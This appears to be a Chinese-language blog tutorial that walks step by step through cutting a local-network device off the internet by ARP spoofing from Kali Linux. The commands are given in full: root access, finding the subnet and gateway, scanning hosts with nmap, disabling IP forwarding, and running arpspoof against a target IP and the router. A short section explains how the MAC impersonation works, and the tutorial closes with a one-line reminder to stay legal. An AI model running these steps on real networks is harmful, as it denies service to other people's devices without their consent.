ARP欺骗使局域网内设备断网

一、实验准备

  1. kali系统:可使用虚拟机软件模拟

    kali虚拟机镜像链接:https://www.kali.org/get-kali/#kali-virtual-machines

    注意虚拟机网络适配器采用桥接模式

  2. 局域网内存在指定断网的设备

二、实验步骤

  1. 打开kali系统命令行:ctrl+alt+t可快速打开终端

  2. 切换到root用户

    bash 复制代码
    sudo su
  3. 查看当前网段

    bash 复制代码
    ifconfig

    inet 192.168.10.145 netmask 255.255.255.0

    表明当前网段为192.168.10.0

  4. 查看当前路由器ip地址

    bash 复制代码
    ip route

    default via 192.168.10.1 dev eth0 proto dhcp src 192.168.10.145 metric 100

    192.168.10.0/24 dev eth0 proto kernel scope link src 192.168.10.145 metric 10

    表明路由器ip为192.168.10.1

  5. 扫描查看目标设备ip

    bash 复制代码
    nmap -sn 192.168.10.1/24  # 使用 Nmap 发现网络中的活动主机,等效于nmap -sn 192.168.10.1-255

    根据设备名称找到对应ip

  6. 设置kali系统不转发数据

    bash 复制代码
    echo 0 > /proc/sys/net/ipv4/ip_forward
  7. 执行arp欺骗

    bash 复制代码
    arpspoof -i eth0 -t 192.168.10.137 -r 192.168.10.1
    • -i: 指定使用的网卡
    • -t:指定欺骗的设备ip地址
    • -r:指定欺骗的路由器ip地址
  8. 目标设备无法获取新数据

三、原理

ARP欺骗

  1. 复制路由器mac地址,伪装为路由器并通知目标设备,以便后续目标设备将数据交给kali
  2. 复制目标设备mac地址,伪装为目标设备并通知路由器,以便后续路由器将数据交给kali
  3. 但kali设置不转发数据,因此路由器和目标设备发送至kali的所有数据均被抛弃,致使目标设备无法与路由器沟通无法获取数据

四、特别注意

请在合法场景下进行实验

相关推荐
头发还没掉光光1 小时前
HTTP协议从基础到实战全解析
linux·服务器·网络·c++·网络协议·http
小白同学_C1 小时前
Lab2-system calls && MIT6.1810操作系统工程【持续更新】
linux·c/c++·操作系统os
物理与数学1 小时前
linux内核 struct super_block
linux·linux内核
Getgit1 小时前
Linux 下查看 DNS 配置信息的常用命令详解
linux·运维·服务器·面试·maven
zhangrelay2 小时前
Linux(ubuntu)如何锁定cpu频率工作在最低能耗模式下
linux·笔记·学习
_OP_CHEN2 小时前
【Linux系统编程】(二十)揭秘 Linux 文件描述符:从底层原理到实战应用,一篇吃透 fd 本质!
linux·后端·操作系统·c/c++·重定向·文件描述符·linux文件
chem41113 小时前
玩客云 边缘AI模型 本地搭建部署 llama.cpp qwen
linux·人工智能·llama
一个平凡而乐于分享的小比特3 小时前
Linux内核中的BogoMIPS详解
linux·bogomips
橘颂TA3 小时前
【Linux 网络】TCP 拥塞控制与异常处理:从原理到实践的深度剖析
linux·运维·网络·tcp/ip·算法·职场和发展·结构与算法
zbguolei3 小时前
CentOS 7.6离线安装Nginx
linux·nginx·centos